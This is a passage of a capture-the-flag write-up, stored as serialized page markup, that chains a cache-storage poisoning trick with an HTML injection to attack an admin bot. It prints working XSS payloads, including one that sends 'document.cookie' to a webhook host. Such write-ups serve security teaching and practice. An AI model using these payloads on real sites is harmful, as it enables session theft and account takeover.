name=",{"type":33,"tag":128,"props":20961,"children":20962},{"style":676},[20963],{"type":38,"value":836},{"type":33,"tag":128,"props":20965,"children":20966},{"class":130,"line":739},[20967,20971,20975,20979,20984,20989,20994],{"type":33,"tag":128,"props":20968,"children":20969},{"style":306},[20970],{"type":38,"value":16876},{"type":33,"tag":128,"props":20972,"children":20973},{"style":312},[20974],{"type":38,"value":315},{"type":33,"tag":128,"props":20976,"children":20977},{"style":676},[20978],{"type":38,"value":669},{"type":33,"tag":128,"props":20980,"children":20981},{"style":140},[20982],{"type":38,"value":20983},">{{VALUE}}",{"type":33,"tag":128,"props":20985,"children":20987},{"style":20986},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[20988],{"type":38,"value":5977},{"type":33,"tag":128,"props":20990,"children":20991},{"style":140},[20992],{"type":38,"value":20993},"img src=x onerror=alert(1)>",{"type":33,"tag":128,"props":20995,"children":20996},{"style":676},[20997],{"type":38,"value":836},{"type":33,"tag":128,"props":20999,"children":21000},{"class":130,"line":765},[21001,21006,21010,21014,21019],{"type":33,"tag":128,"props":21002,"children":21003},{"style":306},[21004],{"type":38,"value":21005}," name",{"type":33,"tag":128,"props":21007,"children":21008},{"style":312},[21009],{"type":38,"value":315},{"type":33,"tag":128,"props":21011,"children":21012},{"style":676},[21013],{"type":38,"value":669},{"type":33,"tag":128,"props":21015,"children":21016},{"style":140},[21017],{"type":38,"value":21018},"ooo",{"type":33,"tag":128,"props":21020,"children":21021},{"style":676},[21022],{"type":38,"value":836},{"type":33,"tag":128,"props":21024,"children":21025},{"class":130,"line":804},[21026],{"type":33,"tag":128,"props":21027,"children":21028},{"style":312},[21029],{"type":38,"value":6097},{"type":33,"tag":75,"props":21031,"children":21033},{"imgSrc":21032},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731288047/writeups/shikanoko/poc_sandbox_xss.webp",[],{"type":33,"tag":47,"props":21035,"children":21036},{},[21037,21039,21045],{"type":38,"value":21038},"We can see that our ",{"type":33,"tag":105,"props":21040,"children":21042},{"className":21041},[],[21043],{"type":38,"value":21044},"\u003Cimg src=x onerror=alert(1)>",{"type":38,"value":21046}," is successfully output from our input",{"type":33,"tag":75,"props":21048,"children":21050},{"imgSrc":21049},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731279103/writeups/shikanoko/html_result.webp",[],{"type":33,"tag":40,"props":21052,"children":21054},{"id":21053},"final-payload",[21055],{"type":38,"value":21056},"Final payload",{"type":33,"tag":47,"props":21058,"children":21059},{},[21060],{"type":38,"value":21061},"We can now chain our two vulnerabilities to retrieve the flag on the bot.",{"type":33,"tag":47,"props":21063,"children":21064},{},[21065],{"type":38,"value":21066},"We will divide our final payload into 2:",{"type":33,"tag":114,"props":21068,"children":21069},{"lang":5929},[21070],{"type":33,"tag":119,"props":21071,"children":21073},{"className":5933,"code":21072,"language":5929,"meta":8,"style":8},"\u003C!-- index.html -->\n\u003Chtml>\n \u003Cbody>\n \u003Ch1>Get flag\u003C/h1>\n \u003C/body>\n \u003Cscript>\n window.open(\"/1.html\", \"_blank\");\n window.open(\"/2.html\", \"_blank\");\n \u003C/script>\n\u003C/html>\n",[21074],{"type":33,"tag":105,"props":21075,"children":21076},{"__ignoreMap":8},[21077,21085,21100,21115,21147,21162,21177,21231,21283,21298],{"type":33,"tag":128,"props":21078,"children":21079},{"class":130,"line":131},[21080],{"type":33,"tag":128,"props":21081,"children":21082},{"style":5541},[21083],{"type":38,"value":21084},"\u003C!-- index.html -->\n",{"type":33,"tag":128,"props":21086,"children":21087},{"class":130,"line":362},[21088,21092,21096],{"type":33,"tag":128,"props":21089,"children":21090},{"style":312},[21091],{"type":38,"value":5977},{"type":33,"tag":128,"props":21093,"children":21094},{"style":1576},[21095],{"type":38,"value":5929},{"type":33,"tag":128,"props":21097,"children":21098},{"style":312},[21099],{"type":38,"value":6097},{"type":33,"tag":128,"props":21101,"children":21102},{"class":130,"line":403},[21103,21107,21111],{"type":33,"tag":128,"props":21104,"children":21105},{"style":312},[21106],{"type":38,"value":6067},{"type":33,"tag":128,"props":21108,"children":21109},{"style":1576},[21110],{"type":38,"value":5671},{"type":33,"tag":128,"props":21112,"children":21113},{"style":312},[21114],{"type":38,"value":6097},{"type":33,"tag":128,"props":21116,"children":21117},{"class":130,"line":739},[21118,21122,21126,21130,21135,21139,21143],{"type":33,"tag":128,"props":21119,"children":21120},{"style":312},[21121],{"type":38,"value":6105},{"type":33,"tag":128,"props":21123,"children":21124},{"style":1576},[21125],{"type":38,"value":34},{"type":33,"tag":128,"props":21127,"children":21128},{"style":312},[21129],{"type":38,"value":6054},{"type":33,"tag":128,"props":21131,"children":21132},{"style":323},[21133],{"type":38,"value":21134},"Get flag",{"type":33,"tag":128,"props":21136,"children":21137},{"style":312},[21138],{"type":38,"value":6190},{"type":33,"tag":128,"props":21140,"children":21141},{"style":1576},[21142],{"type":38,"value":34},{"type":33,"tag":128,"props":21144,"children":21145},{"style":312},[21146],{"type":38,"value":6097},{"type":33,"tag":128,"props":21148,"children":21149},{"class":130,"line":765},[21150,21154,21158],{"type":33,"tag":128,"props":21151,"children":21152},{"style":312},[21153],{"type":38,"value":6206},{"type":33,"tag":128,"props":21155,"children":21156},{"style":1576},[21157],{"type":38,"value":5671},{"type":33,"tag":128,"props":21159,"children":21160},{"style":312},[21161],{"type":38,"value":6097},{"type":33,"tag":128,"props":21163,"children":21164},{"class":130,"line":804},[21165,21169,21173],{"type":33,"tag":128,"props":21166,"children":21167},{"style":312},[21168],{"type":38,"value":6067},{"type":33,"tag":128,"props":21170,"children":21171},{"style":1576},[21172],{"type":38,"value":15064},{"type":33,"tag":128,"props":21174,"children":21175},{"style":312},[21176],{"type":38,"value":6097},{"type":33,"tag":128,"props":21178,"children":21179},{"class":130,"line":839},[21180,21184,21188,21193,21197,21201,21206,21210,21214,21218,21223,21227],{"type":33,"tag":128,"props":21181,"children":21182},{"style":306},[21183],{"type":38,"value":8266},{"type":33,"tag":128,"props":21185,"children":21186},{"style":312},[21187],{"type":38,"value":215},{"type":33,"tag":128,"props":21189,"children":21190},{"style":135},[21191],{"type":38,"value":21192},"open",{"type":33,"tag":128,"props":21194,"children":21195},{"style":312},[21196],{"type":38,"value":5566},{"type":33,"tag":128,"props":21198,"children":21199},{"style":676},[21200],{"type":38,"value":669},{"type":33,"tag":128,"props":21202,"children":21203},{"style":140},[21204],{"type":38,"value":21205},"/1.html",{"type":33,"tag":128,"props":21207,"children":21208},{"style":676},[21209],{"type":38,"value":669},{"type":33,"tag":128,"props":21211,"children":21212},{"style":312},[21213],{"type":38,"value":5584},{"type":33,"tag":128,"props":21215,"children":21216},{"style":676},[21217],{"type":38,"value":679},{"type":33,"tag":128,"props":21219,"children":21220},{"style":140},[21221],{"type":38,"value":21222},"_blank",{"type":33,"tag":128,"props":21224,"children":21225},{"style":676},[21226],{"type":38,"value":669},{"type":33,"tag":128,"props":21228,"children":21229},{"style":312},[21230],{"type":38,"value":5815},{"type":33,"tag":128,"props":21232,"children":21233},{"class":130,"line":848},[21234,21238,21242,21246,21250,21254,21259,21263,21267,21271,21275,21279],{"type":33,"tag":128,"props":21235,"children":21236},{"style":306},[21237],{"type":38,"value":8266},{"type":33,"tag":128,"props":21239,"children":21240},{"style":312},[21241],{"type":38,"value":215},{"type":33,"tag":128,"props":21243,"children":21244},{"style":135},[21245],{"type":38,"value":21192},{"type":33,"tag":128,"props":21247,"children":21248},{"style":312},[21249],{"type":38,"value":5566},{"type":33,"tag":128,"props":21251,"children":21252},{"style":676},[21253],{"type":38,"value":669},{"type":33,"tag":128,"props":21255,"children":21256},{"style":140},[21257],{"type":38,"value":21258},"/2.html",{"type":33,"tag":128,"props":21260,"children":21261},{"style":676},[21262],{"type":38,"value":669},{"type":33,"tag":128,"props":21264,"children":21265},{"style":312},[21266],{"type":38,"value":5584},{"type":33,"tag":128,"props":21268,"children":21269},{"style":676},[21270],{"type":38,"value":679},{"type":33,"tag":128,"props":21272,"children":21273},{"style":140},[21274],{"type":38,"value":21222},{"type":33,"tag":128,"props":21276,"children":21277},{"style":676},[21278],{"type":38,"value":669},{"type":33,"tag":128,"props":21280,"children":21281},{"style":312},[21282],{"type":38,"value":5815},{"type":33,"tag":128,"props":21284,"children":21285},{"class":130,"line":976},[21286,21290,21294],{"type":33,"tag":128,"props":21287,"children":21288},{"style":312},[21289],{"type":38,"value":6206},{"type":33,"tag":128,"props":21291,"children":21292},{"style":1576},[21293],{"type":38,"value":15064},{"type":33,"tag":128,"props":21295,"children":21296},{"style":312},[21297],{"type":38,"value":6097},{"type":33,"tag":128,"props":21299,"children":21300},{"class":130,"line":988},[21301,21305,21309],{"type":33,"tag":128,"props":21302,"children":21303},{"style":312},[21304],{"type":38,"value":6190},{"type":33,"tag":128,"props":21306,"children":21307},{"style":1576},[21308],{"type":38,"value":5929},{"type":33,"tag":128,"props":21310,"children":21311},{"style":312},[21312],{"type":38,"value":6097},{"type":33,"tag":239,"props":21314,"children":21315},{},[21316],{"type":33,"tag":243,"props":21317,"children":21318},{},[21319],{"type":38,"value":21320},"The first will create the entry in our victim's cache storage:",{"type":33,"tag":114,"props":21322,"children":21323},{"lang":5929},[21324],{"type":33,"tag":119,"props":21325,"children":21327},{"className":5933,"code":21326,"language":5929,"meta":8,"style":8},"\u003C!-- ./1.html -->\n \u003Chtml>\n \u003Cbody>\n \u003Ch1>Test poc\u003C/h1>\n \u003Cinput id=\"html\" type=\"text\" name=\"ooo\" placeholder=\"Enter HTML content\">\n \u003C/body>\n \u003Cscript>\n (async () => {\n const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n await sleep(1000);\n document.location = 'http://proxy/?html=\u003Cinput name=\"ooo\" value=\"iiiiii\" name=\"ooo\" type=\"image\">';\n html_elm = document.getElementById(\"html\");\n html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n let event = new Event('change');\n html_elm.dispatchEvent(event);\n })();\n \u003C/script>\n\u003C/html>\n",[21328],{"type":33,"tag":105,"props":21329,"children":21330},{"__ignoreMap":8},[21331,21339,21354,21369,21400,21495,21510,21525,21549,21624,21647,21684,21727,21762,21805,21832,21839,21854],{"type":33,"tag":128,"props":21332,"children":21333},{"class":130,"line":131},[21334],{"type":33,"tag":128,"props":21335,"children":21336},{"style":5541},[21337],{"type":38,"value":21338},"\u003C!-- ./1.html -->\n",{"type":33,"tag":128,"props":21340,"children":21341},{"class":130,"line":362},[21342,21346,21350],{"type":33,"tag":128,"props":21343,"children":21344},{"style":312},[21345],{"type":38,"value":9102},{"type":33,"tag":128,"props":21347,"children":21348},{"style":1576},[21349],{"type":38,"value":5929},{"type":33,"tag":128,"props":21351,"children":21352},{"style":312},[21353],{"type":38,"value":6097},{"type":33,"tag":128,"props":21355,"children":21356},{"class":130,"line":403},[21357,21361,21365],{"type":33,"tag":128,"props":21358,"children":21359},{"style":312},[21360],{"type":38,"value":6067},{"type":33,"tag":128,"props":21362,"children":21363},{"style":1576},[21364],{"type":38,"value":5671},{"type":33,"tag":128,"props":21366,"children":21367},{"style":312},[21368],{"type":38,"value":6097},{"type":33,"tag":128,"props":21370,"children":21371},{"class":130,"line":739},[21372,21376,21380,21384,21388,21392,21396],{"type":33,"tag":128,"props":21373,"children":21374},{"style":312},[21375],{"type":38,"value":6105},{"type":33,"tag":128,"props":21377,"children":21378},{"style":1576},[21379],{"type":38,"value":34},{"type":33,"tag":128,"props":21381,"children":21382},{"style":312},[21383],{"type":38,"value":6054},{"type":33,"tag":128,"props":21385,"children":21386},{"style":323},[21387],{"type":38,"value":19514},{"type":33,"tag":128,"props":21389,"children":21390},{"style":312},[21391],{"type":38,"value":6190},{"type":33,"tag":128,"props":21393,"children":21394},{"style":1576},[21395],{"type":38,"value":34},{"type":33,"tag":128,"props":21397,"children":21398},{"style":312},[21399],{"type":38,"value":6097},{"type":33,"tag":128,"props":21401,"children":21402},{"class":130,"line":765},[21403,21407,21411,21415,21419,21423,21427,21431,21435,21439,21443,21447,21451,21455,21459,21463,21467,21471,21475,21479,21483,21487,21491],{"type":33,"tag":128,"props":21404,"children":21405},{"style":312},[21406],{"type":38,"value":6105},{"type":33,"tag":128,"props":21408,"children":21409},{"style":1576},[21410],{"type":38,"value":14882},{"type":33,"tag":128,"props":21412,"children":21413},{"style":306},[21414],{"type":38,"value":5987},{"type":33,"tag":128,"props":21416,"children":21417},{"style":312},[21418],{"type":38,"value":315},{"type":33,"tag":128,"props":21420,"children":21421},{"style":676},[21422],{"type":38,"value":669},{"type":33,"tag":128,"props":21424,"children":21425},{"style":140},[21426],{"type":38,"value":5929},{"type":33,"tag":128,"props":21428,"children":21429},{"style":676},[21430],{"type":38,"value":669},{"type":33,"tag":128,"props":21432,"children":21433},{"style":306},[21434],{"type":38,"value":14887},{"type":33,"tag":128,"props":21436,"children":21437},{"style":312},[21438],{"type":38,"value":315},{"type":33,"tag":128,"props":21440,"children":21441},{"style":676},[21442],{"type":38,"value":669},{"type":33,"tag":128,"props":21444,"children":21445},{"style":140},[21446],{"type":38,"value":38},{"type":33,"tag":128,"props":21448,"children":21449},{"style":676},[21450],{"type":38,"value":669},{"type":33,"tag":128,"props":21452,"children":21453},{"style":306},[21454],{"type":38,"value":14688},{"type":33,"tag":128,"props":21456,"children":21457},{"style":312},[21458],{"type":38,"value":315},{"type":33,"tag":128,"props":21460,"children":21461},{"style":676},[21462],{"type":38,"value":669},{"type":33,"tag":128,"props":21464,"children":21465},{"style":140},[21466],{"type":38,"value":21018},{"type":33,"tag":128,"props":21468,"children":21469},{"style":676},[21470],{"type":38,"value":669},{"type":33,"tag":128,"props":21472,"children":21473},{"style":306},[21474],{"type":38,"value":14928},{"type":33,"tag":128,"props":21476,"children":21477},{"style":312},[21478],{"type":38,"value":315},{"type":33,"tag":128,"props":21480,"children":21481},{"style":676},[21482],{"type":38,"value":669},{"type":33,"tag":128,"props":21484,"children":21485},{"style":140},[21486],{"type":38,"value":14941},{"type":33,"tag":128,"props":21488,"children":21489},{"style":676},[21490],{"type":38,"value":669},{"type":33,"tag":128,"props":21492,"children":21493},{"style":312},[21494],{"type":38,"value":6097},{"type":33,"tag":128,"props":21496,"children":21497},{"class":130,"line":804},[21498,21502,21506],{"type":33,"tag":128,"props":21499,"children":21500},{"style":312},[21501],{"type":38,"value":6206},{"type":33,"tag":128,"props":21503,"children":21504},{"style":1576},[21505],{"type":38,"value":5671},{"type":33,"tag":128,"props":21507,"children":21508},{"style":312},[21509],{"type":38,"value":6097},{"type":33,"tag":128,"props":21511,"children":21512},{"class":130,"line":839},[21513,21517,21521],{"type":33,"tag":128,"props":21514,"children":21515},{"style":312},[21516],{"type":38,"value":6067},{"type":33,"tag":128,"props":21518,"children":21519},{"style":1576},[21520],{"type":38,"value":15064},{"type":33,"tag":128,"props":21522,"children":21523},{"style":312},[21524],{"type":38,"value":6097},{"type":33,"tag":128,"props":21526,"children":21527},{"class":130,"line":848},[21528,21533,21537,21541,21545],{"type":33,"tag":128,"props":21529,"children":21530},{"style":312},[21531],{"type":38,"value":21532}," (",{"type":33,"tag":128,"props":21534,"children":21535},{"style":300},[21536],{"type":38,"value":13862},{"type":33,"tag":128,"props":21538,"children":21539},{"style":312},[21540],{"type":38,"value":13259},{"type":33,"tag":128,"props":21542,"children":21543},{"style":312},[21544],{"type":38,"value":5625},{"type":33,"tag":128,"props":21546,"children":21547},{"style":312},[21548],{"type":38,"value":762},{"type":33,"tag":128,"props":21550,"children":21551},{"class":130,"line":976},[21552,21556,21560,21564,21568,21572,21576,21580,21584,21588,21592,21596,21600,21604,21608,21612,21616,21620],{"type":33,"tag":128,"props":21553,"children":21554},{"style":300},[21555],{"type":38,"value":19683},{"type":33,"tag":128,"props":21557,"children":21558},{"style":135},[21559],{"type":38,"value":19688},{"type":33,"tag":128,"props":21561,"children":21562},{"style":312},[21563],{"type":38,"value":5657},{"type":33,"tag":128,"props":21565,"children":21566},{"style":312},[21567],{"type":38,"value":2852},{"type":33,"tag":128,"props":21569,"children":21570},{"style":306},[21571],{"type":38,"value":19701},{"type":33,"tag":128,"props":21573,"children":21574},{"style":312},[21575],{"type":38,"value":2966},{"type":33,"tag":128,"props":21577,"children":21578},{"style":312},[21579],{"type":38,"value":5625},{"type":33,"tag":128,"props":21581,"children":21582},{"style":300},[21583],{"type":38,"value":13061},{"type":33,"tag":128,"props":21585,"children":21586},{"style":437},[21587],{"type":38,"value":13066},{"type":33,"tag":128,"props":21589,"children":21590},{"style":312},[21591],{"type":38,"value":5566},{"type":33,"tag":128,"props":21593,"children":21594},{"style":306},[21595],{"type":38,"value":13076},{"type":33,"tag":128,"props":21597,"children":21598},{"style":312},[21599],{"type":38,"value":5625},{"type":33,"tag":128,"props":21601,"children":21602},{"style":135},[21603],{"type":38,"value":19734},{"type":33,"tag":128,"props":21605,"children":21606},{"style":312},[21607],{"type":38,"value":5566},{"type":33,"tag":128,"props":21609,"children":21610},{"style":306},[21611],{"type":38,"value":13076},{"type":33,"tag":128,"props":21613,"children":21614},{"style":312},[21615],{"type":38,"value":5584},{"type":33,"tag":128,"props":21617,"children":21618},{"style":306},[21619],{"type":38,"value":19751},{"type":33,"tag":128,"props":21621,"children":21622},{"style":312},[21623],{"type":38,"value":9722},{"type":33,"tag":128,"props":21625,"children":21626},{"class":130,"line":988},[21627,21631,21635,21639,21643],{"type":33,"tag":128,"props":21628,"children":21629},{"style":1576},[21630],{"type":38,"value":19763},{"type":33,"tag":128,"props":21632,"children":21633},{"style":135},[21634],{"type":38,"value":19688},{"type":33,"tag":128,"props":21636,"children":21637},{"style":312},[21638],{"type":38,"value":5566},{"type":33,"tag":128,"props":21640,"children":21641},{"style":523},[21642],{"type":38,"value":78},{"type":33,"tag":128,"props":21644,"children":21645},{"style":312},[21646],{"type":38,"value":5815},{"type":33,"tag":128,"props":21648,"children":21649},{"class":130,"line":1001},[21650,21655,21659,21663,21667,21671,21676,21680],{"type":33,"tag":128,"props":21651,"children":21652},{"style":306},[21653],{"type":38,"value":21654}," document",{"type":33,"tag":128,"props":21656,"children":21657},{"style":312},[21658],{"type":38,"value":215},{"type":33,"tag":128,"props":21660,"children":21661},{"style":306},[21662],{"type":38,"value":8275},{"type":33,"tag":128,"props":21664,"children":21665},{"style":312},[21666],{"type":38,"value":5657},{"type":33,"tag":128,"props":21668,"children":21669},{"style":676},[21670],{"type":38,"value":6739},{"type":33,"tag":128,"props":21672,"children":21673},{"style":140},[21674],{"type":38,"value":21675},"http://proxy/?html=\u003Cinput name=\"ooo\" value=\"iiiiii\" name=\"ooo\" type=\"image\">",{"type":33,"tag":128,"props":21677,"children":21678},{"style":676},[21679],{"type":38,"value":6040},{"type":33,"tag":128,"props":21681,"children":21682},{"style":312},[21683],{"type":38,"value":5676},{"type":33,"tag":128,"props":21685,"children":21686},{"class":130,"line":1014},[21687,21691,21695,21699,21703,21707,21711,21715,21719,21723],{"type":33,"tag":128,"props":21688,"children":21689},{"style":306},[21690],{"type":38,"value":19824},{"type":33,"tag":128,"props":21692,"children":21693},{"style":312},[21694],{"type":38,"value":5657},{"type":33,"tag":128,"props":21696,"children":21697},{"style":306},[21698],{"type":38,"value":7562},{"type":33,"tag":128,"props":21700,"children":21701},{"style":312},[21702],{"type":38,"value":215},{"type":33,"tag":128,"props":21704,"children":21705},{"style":135},[21706],{"type":38,"value":19841},{"type":33,"tag":128,"props":21708,"children":21709},{"style":312},[21710],{"type":38,"value":5566},{"type":33,"tag":128,"props":21712,"children":21713},{"style":676},[21714],{"type":38,"value":669},{"type":33,"tag":128,"props":21716,"children":21717},{"style":140},[21718],{"type":38,"value":5929},{"type":33,"tag":128,"props":21720,"children":21721},{"style":676},[21722],{"type":38,"value":669},{"type":33,"tag":128,"props":21724,"children":21725},{"style":312},[21726],{"type":38,"value":5815},{"type":33,"tag":128,"props":21728,"children":21729},{"class":130,"line":1026},[21730,21734,21738,21742,21746,21750,21754,21758],{"type":33,"tag":128,"props":21731,"children":21732},{"style":306},[21733],{"type":38,"value":19824},{"type":33,"tag":128,"props":21735,"children":21736},{"style":312},[21737],{"type":38,"value":215},{"type":33,"tag":128,"props":21739,"children":21740},{"style":306},[21741],{"type":38,"value":14160},{"type":33,"tag":128,"props":21743,"children":21744},{"style":312},[21745],{"type":38,"value":5657},{"type":33,"tag":128,"props":21747,"children":21748},{"style":676},[21749],{"type":38,"value":679},{"type":33,"tag":128,"props":21751,"children":21752},{"style":140},[21753],{"type":38,"value":19454},{"type":33,"tag":128,"props":21755,"children":21756},{"style":676},[21757],{"type":38,"value":669},{"type":33,"tag":128,"props":21759,"children":21760},{"style":312},[21761],{"type":38,"value":5676},{"type":33,"tag":128,"props":21763,"children":21764},{"class":130,"line":1038},[21765,21769,21773,21777,21781,21785,21789,21793,21797,21801],{"type":33,"tag":128,"props":21766,"children":21767},{"style":300},[21768],{"type":38,"value":19904},{"type":33,"tag":128,"props":21770,"children":21771},{"style":306},[21772],{"type":38,"value":17575},{"type":33,"tag":128,"props":21774,"children":21775},{"style":312},[21776],{"type":38,"value":5657},{"type":33,"tag":128,"props":21778,"children":21779},{"style":300},[21780],{"type":38,"value":13061},{"type":33,"tag":128,"props":21782,"children":21783},{"style":135},[21784],{"type":38,"value":19921},{"type":33,"tag":128,"props":21786,"children":21787},{"style":312},[21788],{"type":38,"value":5566},{"type":33,"tag":128,"props":21790,"children":21791},{"style":676},[21792],{"type":38,"value":6040},{"type":33,"tag":128,"props":21794,"children":21795},{"style":140},[21796],{"type":38,"value":17521},{"type":33,"tag":128,"props":21798,"children":21799},{"style":676},[21800],{"type":38,"value":6040},{"type":33,"tag":128,"props":21802,"children":21803},{"style":312},[21804],{"type":38,"value":5815},{"type":33,"tag":128,"props":21806,"children":21807},{"class":130,"line":1051},[21808,21812,21816,21820,21824,21828],{"type":33,"tag":128,"props":21809,"children":21810},{"style":306},[21811],{"type":38,"value":19824},{"type":33,"tag":128,"props":21813,"children":21814},{"style":312},[21815],{"type":38,"value":215},{"type":33,"tag":128,"props":21817,"children":21818},{"style":135},[21819],{"type":38,"value":19957},{"type":33,"tag":128,"props":21821,"children":21822},{"style":312},[21823],{"type":38,"value":5566},{"type":33,"tag":128,"props":21825,"children":21826},{"style":306},[21827],{"type":38,"value":17546},{"type":33,"tag":128,"props":21829,"children":21830},{"style":312},[21831],{"type":38,"value":5815},{"type":33,"tag":128,"props":21833,"children":21834},{"class":130,"line":1063},[21835],{"type":33,"tag":128,"props":21836,"children":21837},{"style":312},[21838],{"type":38,"value":19977},{"type":33,"tag":128,"props":21840,"children":21841},{"class":130,"line":1076},[21842,21846,21850],{"type":33,"tag":128,"props":21843,"children":21844},{"style":312},[21845],{"type":38,"value":6206},{"type":33,"tag":128,"props":21847,"children":21848},{"style":1576},[21849],{"type":38,"value":15064},{"type":33,"tag":128,"props":21851,"children":21852},{"style":312},[21853],{"type":38,"value":6097},{"type":33,"tag":128,"props":21855,"children":21856},{"class":130,"line":1089},[21857,21861,21865],{"type":33,"tag":128,"props":21858,"children":21859},{"style":312},[21860],{"type":38,"value":6190},{"type":33,"tag":128,"props":21862,"children":21863},{"style":1576},[21864],{"type":38,"value":5929},{"type":33,"tag":128,"props":21866,"children":21867},{"style":312},[21868],{"type":38,"value":6097},{"type":33,"tag":239,"props":21870,"children":21871},{},[21872],{"type":33,"tag":243,"props":21873,"children":21874},{},[21875],{"type":38,"value":21876},"The second will exploit the XSS injection to retrieve the admin's cookie:",{"type":33,"tag":114,"props":21878,"children":21879},{"lang":5929},[21880],{"type":33,"tag":119,"props":21881,"children":21883},{"className":5933,"code":21882,"language":5929,"meta":8,"style":8},"\u003C!-- ./2.html -->\n\u003Chtml>\n \u003Cbody>\n \u003Ch1>Test poc\u003C/h1>\n \u003Cinput id=\"html\" type=\"text\" name=\"ooo\" placeholder=\"Enter HTML content\">\n \u003C/body>\n \u003Cscript>\n (async () => {\n const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n await sleep(1000);\n document.location = `http://proxy/?html=\u003Cinput name=\"aaa\" value=\">{{VALUE}}hello\u003Cimg src=x onerror=window.location='https://webhook/?flag='+btoa(document.cookie)>\" data-value=\"DDDDD{{VALUE}}aaaaa id=asrc=x name=\"ooo\" type=\"image\">`;\n html_elm = document.getElementById(\"html\");\n html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n let event = new Event('change');\n html_elm.dispatchEvent(event);\n })();\n \u003C/script>\n\u003C/html>\n\n",[21884],{"type":33,"tag":105,"props":21885,"children":21886},{"__ignoreMap":8},[21887,21895,21910,21925,21956,22051,22066,22081,22104,22179,22202,22238,22281,22316,22359,22386,22393,22408],{"type":33,"tag":128,"props":21888,"children":21889},{"class":130,"line":131},[21890],{"type":33,"tag":128,"props":21891,"children":21892},{"style":5541},[21893],{"type":38,"value":21894},"\u003C!-- ./2.html -->\n",{"type":33,"tag":128,"props":21896,"children":21897},{"class":130,"line":362},[21898,21902,21906],{"type":33,"tag":128,"props":21899,"children":21900},{"style":312},[21901],{"type":38,"value":5977},{"type":33,"tag":128,"props":21903,"children":21904},{"style":1576},[21905],{"type":38,"value":5929},{"type":33,"tag":128,"props":21907,"children":21908},{"style":312},[21909],{"type":38,"value":6097},{"type":33,"tag":128,"props":21911,"children":21912},{"class":130,"line":403},[21913,21917,21921],{"type":33,"tag":128,"props":21914,"children":21915},{"style":312},[21916],{"type":38,"value":6067},{"type":33,"tag":128,"props":21918,"children":21919},{"style":1576},[21920],{"type":38,"value":5671},{"type":33,"tag":128,"props":21922,"children":21923},{"style":312},[21924],{"type":38,"value":6097},{"type":33,"tag":128,"props":21926,"children":21927},{"class":130,"line":739},[21928,21932,21936,21940,21944,21948,21952],{"type":33,"tag":128,"props":21929,"children":21930},{"style":312},[21931],{"type":38,"value":6105},{"type":33,"tag":128,"props":21933,"children":21934},{"style":1576},[21935],{"type":38,"value":34},{"type":33,"tag":128,"props":21937,"children":21938},{"style":312},[21939],{"type":38,"value":6054},{"type":33,"tag":128,"props":21941,"children":21942},{"style":323},[21943],{"type":38,"value":19514},{"type":33,"tag":128,"props":21945,"children":21946},{"style":312},[21947],{"type":38,"value":6190},{"type":33,"tag":128,"props":21949,"children":21950},{"style":1576},[21951],{"type":38,"value":34},{"type":33,"tag":128,"props":21953,"children":21954},{"style":312},[21955],{"type":38,"value":6097},{"type":33,"tag":128,"props":21957,"children":21958},{"class":130,"line":765},[21959,21963,21967,21971,21975,21979,21983,21987,21991,21995,21999,22003,22007,22011,22015,22019,22023,22027,22031,22035,22039,22043,22047],{"type":33,"tag":128,"props":21960,"children":21961},{"style":312},[21962],{"type":38,"value":6105},{"type":33,"tag":128,"props":21964,"children":21965},{"style":1576},[21966],{"type":38,"value":14882},{"type":33,"tag":128,"props":21968,"children":21969},{"style":306},[21970],{"type":38,"value":5987},{"type":33,"tag":128,"props":21972,"children":21973},{"style":312},[21974],{"type":38,"value":315},{"type":33,"tag":128,"props":21976,"children":21977},{"style":676},[21978],{"type":38,"value":669},{"type":33,"tag":128,"props":21980,"children":21981},{"style":140},[21982],{"type":38,"value":5929},{"type":33,"tag":128,"props":21984,"children":21985},{"style":676},[21986],{"type":38,"value":669},{"type":33,"tag":128,"props":21988,"children":21989},{"style":306},[21990],{"type":38,"value":14887},{"type":33,"tag":128,"props":21992,"children":21993},{"style":312},[21994],{"type":38,"value":315},{"type":33,"tag":128,"props":21996,"children":21997},{"style":676},[21998],{"type":38,"value":669},{"type":33,"tag":128,"props":22000,"children":22001},{"style":140},[22002],{"type":38,"value":38},{"type":33,"tag":128,"props":22004,"children":22005},{"style":676},[22006],{"type":38,"value":669},{"type":33,"tag":128,"props":22008,"children":22009},{"style":306},[22010],{"type":38,"value":14688},{"type":33,"tag":128,"props":22012,"children":22013},{"style":312},[22014],{"type":38,"value":315},{"type":33,"tag":128,"props":22016,"children":22017},{"style":676},[22018],{"type":38,"value":669},{"type":33,"tag":128,"props":22020,"children":22021},{"style":140},[22022],{"type":38,"value":21018},{"type":33,"tag":128,"props":22024,"children":22025},{"style":676},[22026],{"type":38,"value":669},{"type":33,"tag":128,"props":22028,"children":22029},{"style":306},[22030],{"type":38,"value":14928},{"type":33,"tag":128,"props":22032,"children":22033},{"style":312},[22034],{"type":38,"value":315},{"type":33,"tag":128,"props":22036,"children":22037},{"style":676},[22038],{"type":38,"value":669},{"type":33,"tag":128,"props":22040,"children":22041},{"style":140},[22042],{"type":38,"value":14941},{"type":33,"tag":128,"props":22044,"children":22045},{"style":676},[22046],{"type":38,"value":669},{"type":33,"tag":128,"props":22048,"children":22049},{"style":312},[22050],{"type":38,"value":6097},{"type":33,"tag":128,"props":22052,"children":22053},{"class":130,"line":804},[22054,22058,22062],{"type":33,"tag":128,"props":22055,"children":22056},{"style":312},[22057],{"type":38,"value":6206},{"type":33,"tag":128,"props":22059,"children":22060},{"style":1576},[22061],{"type":38,"value":5671},{"type":33,"tag":128,"props":22063,"children":22064},{"style":312},[22065],{"type":38,"value":6097},{"type":33,"tag":128,"props":22067,"children":22068},{"class":130,"line":839},[22069,22073,22077],{"type":33,"tag":128,"props":22070,"children":22071},{"style":312},[22072],{"type":38,"value":6067},{"type":33,"tag":128,"props":22074,"children":22075},{"style":1576},[22076],{"type":38,"value":15064},{"type":33,"tag":128,"props":22078,"children":22079},{"style":312},[22080],{"type":38,"value":6097},{"type":33,"tag":128,"props":22082,"children":22083},{"class":130,"line":848},[22084,22088,22092,22096,22100],{"type":33,"tag":128,"props":22085,"children":22086},{"style":312},[22087],{"type":38,"value":21532},{"type":33,"tag":128,"props":22089,"children":22090},{"style":300},[22091],{"type":38,"value":13862},{"type":33,"tag":128,"props":22093,"children":22094},{"style":312},[22095],{"type":38,"value":13259},{"type":33,"t